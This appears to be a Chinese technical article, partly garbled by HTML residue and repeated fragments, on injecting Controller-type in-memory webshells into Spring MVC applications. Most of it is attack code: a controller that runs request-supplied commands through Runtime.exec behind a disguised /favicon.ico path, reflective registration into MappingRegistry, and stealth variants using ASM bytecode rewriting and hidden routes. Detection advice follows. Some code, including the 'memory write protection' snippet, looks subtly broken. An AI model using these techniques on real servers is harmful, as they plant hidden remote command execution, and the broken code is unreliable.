Java内存马——Controller型注入技术深度解析<\/h1>

一、核心前提：获取Spring上下文<\/h2>
无论采用哪种注入方式，攻击者必须先获取到当前的Spring ApplicationContext对象，这是操作IoC容器的入口。<\/p>

常见获取方式<\/h3>

WebApplicationContextUtils工具类<\/strong><\/p>

WebApplicationContext context =<\/span> WebApplicationContextUtils.<\/span>getWebApplicationContext<\/span>(<\/span>servletContext);<\/span>
<\/span><\/span><\/code><\/pre>（需先通过Request\/Session\/Filter等获取ServletContext）<\/p>
<\/li>

从已知Bean中获取<\/strong><\/p>

若已有执行点(如已有WebShell)，可通过context.getBean()<\/code>获取关键Bean(如dispatcherServlet)，再反射获取其持有的WebApplicationContext<\/li>
<\/ul>
<\/li>

从当前线程的ContextClassLoader加载<\/strong><\/p>

适用于某些特定环境<\/li>
<\/ul>
<\/li>
<\/ol>
二、直接动态注册Bean（推荐方式）<\/h2>
原理<\/h3>
直接向Spring容器的BeanFactory注册一个恶意Controller的BeanDefinition，使其成为受管理的Bean，并被RequestMappingHandlerMapping扫描。<\/p>
实现步骤<\/h3>


创建恶意Controller类字节码<\/strong><\/p>
public<\/span> class<\/span> EvilController<\/span> {<\/span>
<\/span><\/span>    @RequestMapping<\/span>(<\/span>"\/favicon.ico"<\/span>)<\/span>
<\/span><\/span>    public<\/span> void<\/span> execute<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String cmd =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>            \/\/ 读取process输出并写入response
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

动态生成BeanDefinition<\/strong><\/p>
\/\/ 1. 创建GenericBeanDefinition
<\/span><\/span><\/span><\/span>GenericBeanDefinition beanDefinition =<\/span> new<\/span> GenericBeanDefinition();<\/span>
<\/span><\/span>beanDefinition.<\/span>setBeanClassName<\/span>(<\/span>"com.evil.EvilController"<\/span>);<\/span>
<\/span><\/span>beanDefinition.<\/span>setScope<\/span>(<\/span>BeanDefinition.<\/span>SCOPE_SINGLETON<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 获取BeanFactory
<\/span><\/span><\/span><\/span>DefaultListableBeanFactory beanFactory =<\/span> (<\/span>DefaultListableBeanFactory)<\/span> context.<\/span>getAutowireCapableBeanFactory<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 注册BeanDefinition
<\/span><\/span><\/span><\/span>beanFactory.<\/span>registerBeanDefinition<\/span>(<\/span>"evilController"<\/span>,<\/span> beanDefinition);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

触发RequestMapping注册<\/strong><\/p>
\/\/ 获取RequestMappingHandlerMapping
<\/span><\/span><\/span><\/span>RequestMappingHandlerMapping mapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取恶意Controller实例
<\/span><\/span><\/span><\/span>Object controller =<\/span> context.<\/span>getBean<\/span>(<\/span>"evilController"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 注册HandlerMethod
<\/span><\/span><\/span><\/span>mapping.<\/span>registerHandler<\/span>(<\/span>controller);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
优缺点分析<\/h3>

✅ 优点<\/strong>：符合Spring标准流程，稳定可靠<\/li>
❌ 缺点<\/strong>：需要手动触发HandlerMapping注册，可能引起短暂请求阻塞<\/li>
<\/ul>
三、修改RequestMappingHandlerMapping的MappingRegistry<\/h2>
原理<\/h3>
Spring MVC最终将URL映射关系存储在MappingRegistry中。攻击者直接操作该内部结构，添加恶意映射。<\/p>
实现步骤<\/h3>


获取关键对象<\/strong><\/p>
RequestMappingHandlerMapping mapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射获取私有字段mappingRegistry
<\/span><\/span><\/span><\/span>Field registryField =<\/span> mapping.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"mappingRegistry"<\/span>);<\/span>
<\/span><\/span>registryField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>MappingRegistry mappingRegistry =<\/span> (<\/span>MappingRegistry)<\/span> registryField.<\/span>get<\/span>(<\/span>mapping);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

创建恶意HandlerMethod<\/strong><\/p>
\/\/ 创建恶意Controller实例
<\/span><\/span><\/span><\/span>Object evilController =<\/span> new<\/span> EvilController();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取目标方法
<\/span><\/span><\/span><\/span>Method executeMethod =<\/span> evilController.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"execute"<\/span>,<\/span> HttpServletRequest.<\/span>class<\/span>,<\/span> HttpServletResponse.<\/span>class<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建HandlerMethod
<\/span><\/span><\/span><\/span>HandlerMethod handlerMethod =<\/span> new<\/span> HandlerMethod(<\/span>evilController,<\/span> executeMethod);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

构造RequestMappingInfo<\/strong><\/p>
RequestMappingInfo requestMappingInfo =<\/span> RequestMappingInfo
<\/span><\/span>    .<\/span>paths<\/span>(<\/span>"\/favicon.ico"<\/span>)<\/span>
<\/span><\/span>    .<\/span>methods<\/span>(<\/span>RequestMethod.<\/span>GET<\/span>)<\/span>
<\/span><\/span>    .<\/span>build<\/span>();<\/span>
<\/span><\/span><\/code><\/pre><\/li>

注入MappingRegistry<\/strong><\/p>
\/\/ 反射调用register方法
<\/span><\/span><\/span><\/span>Method registerMethod =<\/span> MappingRegistry.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"register"<\/span>,<\/span> Mapping.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>,<\/span> Method.<\/span>class<\/span>);<\/span>
<\/span><\/span>registerMethod.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>registerMethod.<\/span>invoke<\/span>(<\/span>mappingRegistry,<\/span> requestMappingInfo,<\/span> evilController,<\/span> executeMethod);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
优缺点分析<\/h3>

✅ 优点<\/strong>：完全内存化，不创建新Bean，极度隐蔽<\/li>
❌ 缺点<\/strong>：

严重依赖Spring内部实现，版本兼容性差<\/li>
Controller实例非Spring管理，需自行维护生命周期<\/li>
绕过Bean初始化流程，可能导致意外错误<\/li>
<\/ul>
<\/li>
<\/ul>
四、利用父子容器机制注入<\/h2>
适用场景<\/h3>
当应用存在父子容器结构时(如Spring + Spring MVC)，可将恶意Controller注册到子容器中，避开父容器管理。<\/p>
原理<\/h3>

父容器(Root WebApplicationContext)<\/strong>：管理Service、DAO等<\/li>
子容器(Servlet WebApplicationContext)<\/strong>：管理Controller、Interceptor等Web组件<\/li>
<\/ul>
实现步骤<\/h3>


获取子容器<\/strong><\/p>
ServletContext servletContext =<\/span> request.<\/span>getServletContext<\/span>();<\/span>
<\/span><\/span>String servletName =<\/span> "dispatcher"<\/span>;<\/span> \/\/ DispatcherServlet名称
<\/span><\/span><\/span><\/span>WebApplicationContext childContext =<\/span> WebApplicationContextUtils.<\/span>getWebApplicationContext<\/span>(<\/span>
<\/span><\/span>    servletContext,<\/span> 
<\/span><\/span>    "org.springframework.web.servlet.FrameworkServlet.CONTEXT."<\/span> +<\/span> servletName
<\/span><\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

在子容器中注册恶意Controller Bean<\/strong><\/p>

方式同"直接动态注册Bean"，使用子容器的BeanFactory注册BeanDefinition并触发HandlerMapping更新<\/li>
<\/ul>
<\/li>
<\/ol>
优缺点分析<\/h3>

✅ 优势<\/strong>：隐蔽性强，尤其当安全扫描只检查父容器时<\/li>
❌ 注意<\/strong>：依赖应用存在父子容器结构(典型Spring MVC项目都有)<\/li>
<\/ul>
五、内存马存活的关键技术<\/h2>
1. 防止GC回收<\/h3>

方式一<\/strong>中Controller作为Spring单例Bean，由容器持有，不会被回收<\/li>
方式二<\/strong>需自行创建强引用(如将其存入静态Map或ThreadLocal)<\/li>
<\/ul>
2. URL路径伪装<\/h3>
使用\/favicon.ico<\/code>、\/common.css<\/code>、\/images\/logo.png<\/code>等看似正常的路径降低怀疑<\/p>
六、检测与防御方案<\/h2>
1. 监控Bean动态注册<\/h3>

RASP Hook BeanDefinitionRegistry.registerBeanDefinition()<\/code>方法<\/li>
监控DefaultListableBeanFactory<\/code>的beanDefinitionMap<\/code>变化<\/li>
<\/ul>
2. 扫描MappingRegistry<\/h3>

定期dump RequestMappingHandlerMapping<\/code>中的URL映射表<\/li>
对比基线：记录系统启动时的合法Mapping，检测新增项<\/li>
<\/ul>
3. 运行时流量分析<\/h3>

监控访问"伪装路径"但返回非预期内容(如命令回显)的请求<\/li>
<\/ul>
4. 强化容器安全<\/h3>

禁止非信任来源的JSP\/Controller执行动态类加载<\/li>
使用SecurityManager限制反射操作敏感类<\/li>
<\/ul>
5. 代码审计<\/h3>
检查是否存在可被利用的漏洞点(如反序列化、表达式注入)，阻断注入入口<\/p>
七、技术对比总结<\/h2>



注入方式<\/th>
关键技术点<\/th>
隐蔽性<\/th>
稳定性<\/th>
适用场景<\/th>
<\/tr>
<\/thead>


动态注册Bean<\/td>
BeanFactory + HandlerMapping刷新<\/td>
高<\/td>
高<\/td>
通用<\/td>
<\/tr>

修改MappingRegistry<\/td>
反射操作内部MappingRegistry<\/td>
极高<\/td>
中(依赖版本)<\/td>
追求极致隐蔽<\/td>
<\/tr>

父子容器注入<\/td>
定位子容器 + 注册Bean<\/td>
高<\/td>
高<\/td>
存在父子容器的Spring MVC应用<\/td>
<\/tr>
<\/tbody>
<\/table>
八、高级技术演进<\/h2>


跨控制器注入<\/strong><\/p>
public<\/span> void<\/span> existingControllerMethod<\/span>(<\/span>\/*原始参数*\/<\/span>)<\/span> {<\/span>
<\/span><\/span>    \/\/ 原始逻辑
<\/span><\/span><\/span><\/span>
<\/span><\/span>    \/\/ 寄生逻辑
<\/span><\/span><\/span><\/span>    if<\/span> (<\/span>request.<\/span>getParameter<\/span>(<\/span>"debug"<\/span>)<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        executeMaliciousCode(<\/span>request,<\/span> response);<\/span>
<\/span><\/span>        return<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

基于ASM的字节码植入<\/strong><\/p>
ClassReader cr =<\/span> new<\/span> ClassReader(<\/span>TargetController.<\/span>class<\/span>);<\/span>
<\/span><\/span>ClassWriter cw =<\/span> new<\/span> ClassWriter(<\/span>ClassWriter.<\/span>COMPUTE_FRAMES<\/span>);<\/span>
<\/span><\/span>ClassVisitor cv =<\/span> new<\/span> GhostInjectionAdapter(<\/span>cw);<\/span>
<\/span><\/span>cr.<\/span>accept<\/span>(<\/span>cv,<\/span> ClassReader.<\/span>EXPAND_FRAMES<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> modifiedBytes =<\/span> cw.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>redefineClass(<\/span>TargetController.<\/span>class<\/span>,<\/span> modifiedBytes);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

结合响应式编程模型<\/strong><\/p>
@Bean<\/span>
<\/span><\/span>public<\/span> RouterFunction<<\/span>ServerResponse><\/span> ghostRoute<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> route()<\/span>
<\/span><\/span>        .<\/span>GET<\/span>(<\/span>"\/hidden\/path"<\/span>,<\/span> request -><\/span> {<\/span>
<\/span><\/span>            \/\/ 恶意处理逻辑
<\/span><\/span><\/span><\/span>            return<\/span> ServerResponse.<\/span>ok<\/span>().<\/span>body<\/span>(...);<\/span>
<\/span><\/span>        })<\/span>
<\/span><\/span>        .<\/span>build<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
九、防御体系构建<\/h2>


运行时映射监控<\/strong><\/p>

建立请求映射基线<\/li>
实时检测异常注册<\/li>
<\/ul>
<\/li>

类加载器白名单<\/strong><\/p>

限制非信任类加载器<\/li>
验证类来源证书<\/li>
<\/ul>
<\/li>

内存写保护<\/strong><\/p>
instrumentation.<\/span>redefineModule<\/span>(<\/span>module,<\/span> 
<\/span><\/span>    Set.<\/span>of<\/span>(<\/span>MappingRegistry.<\/span>class<\/span>),<\/span> 
<\/span><\/span>    Map.<\/span>of<\/span>(),<\/span> Map.<\/span>of<\/span>(),<\/span> Set.<\/span>of<\/span>(),<\/span> Map.<\/span>of<\/span>());<\/span>
<\/span><\/span><\/code><\/pre><\/li>

深度行为分析<\/strong><\/p>

监控反射调用模式<\/li>
检测非常规路径请求<\/li>
<\/ul>
<\/li>
<\/ol>
通过全面了解这些技术原理和防御措施，可以有效提升对Controller型内存马的检测和防御能力。<\/p>

Java内存马——Controller型注入技术深度解析<\/h1>

一、核心前提：获取Spring上下文<\/h2> 无论采用哪种注入方式，攻击者必须先获取到当前的Spring ApplicationContext对象，这是操作IoC容器的入口。<\/p>

二、直接动态注册Bean（推荐方式）<\/h2>

原理<\/h3> 直接向Spring容器的BeanFactory注册一个恶意Controller的BeanDefinition，使其成为受管理的Bean，并被RequestMappingHandlerMapping扫描。<\/p>

三、修改RequestMappingHandlerMapping的MappingRegistry<\/h2>

原理<\/h3> Spring MVC最终将URL映射关系存储在MappingRegistry中。攻击者直接操作该内部结构，添加恶意映射。<\/p>

四、利用父子容器机制注入<\/h2>

适用场景<\/h3> 当应用存在父子容器结构时(如Spring + Spring MVC)，可将恶意Controller注册到子容器中，避开父容器管理。<\/p>

五、内存马存活的关键技术<\/h2>

2. URL路径伪装<\/h3> 使用\/favicon.ico<\/code>、\/common.css<\/code>、\/images\/logo.png<\/code>等看似正常的路径降低怀疑<\/p>

5. 代码审计<\/h3> 检查是否存在可被利用的漏洞点(如反序列化、表达式注入)，阻断注入入口<\/p>

一、核心前提：获取Spring上下文<\/h2>
无论采用哪种注入方式，攻击者必须先获取到当前的Spring ApplicationContext对象，这是操作IoC容器的入口。<\/p>

原理<\/h3>
直接向Spring容器的BeanFactory注册一个恶意Controller的BeanDefinition，使其成为受管理的Bean，并被RequestMappingHandlerMapping扫描。<\/p>

原理<\/h3>
Spring MVC最终将URL映射关系存储在MappingRegistry中。攻击者直接操作该内部结构，添加恶意映射。<\/p>

适用场景<\/h3>
当应用存在父子容器结构时(如Spring + Spring MVC)，可将恶意Controller注册到子容器中，避开父容器管理。<\/p>

2. URL路径伪装<\/h3>
使用`\/favicon.ico<\/code>、\/common.css<\/code>、\/images\/logo.png<\/code>等看似正常的路径降低怀疑<\/p>`

5. 代码审计<\/h3>
检查是否存在可被利用的漏洞点(如反序列化、表达式注入)，阻断注入入口<\/p>